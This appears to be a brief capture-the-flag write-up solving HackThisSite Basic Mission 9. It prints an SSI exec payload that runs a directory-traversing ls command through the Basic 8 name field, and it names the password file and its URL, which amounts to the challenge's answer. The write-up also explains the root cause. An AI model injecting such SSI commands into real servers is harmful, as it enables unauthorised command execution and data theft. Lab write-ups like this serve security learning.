Back to list
CTFVery Easy

HackThisSite — Basic Mission 9

ducky
2026-05-19
17 views
1 min read

HackThisSite — Basic Mission 9


Key Hint from the Page

"In my attempt to limit SSI to level 8 only, I mistakenly screwed up somewhere — there is a way to get the level 9 password."

Level 9 has no input field for injection. The attack surface is still Basic 8.


Exploitation

Step 1 — Go back to Basic 8's name field

Use the SSI exec payload, but traverse into Level 9's directory:

<!--#exec cmd="ls ../../9/"-->

Step 2 — Submit & Click the Link

Output in the .shtml file:

index.php   p91e283zc3.php

Step 3 — Access the Password File

Navigate to:

https://www.hackthissite.org/missions/basic/9/p91e283zc3.php

Returns the plaintext password → submit in Level 9 → Congratz!


Root Cause

SSI execution in Basic 8 was never properly sandboxed. Combined with no path restriction on cmd=, directory traversal (../../9/) lets an attacker reach any adjacent directory on the server.


Key Takeaway

A vulnerability in one module can compromise another. SSI execution must be fully disabled or strictly sandboxed — partial restrictions with no path validation are ineffective.

Tags

#hackthissite#Basic Mission 9#basic-mission-9

Keep Reading

Related writeups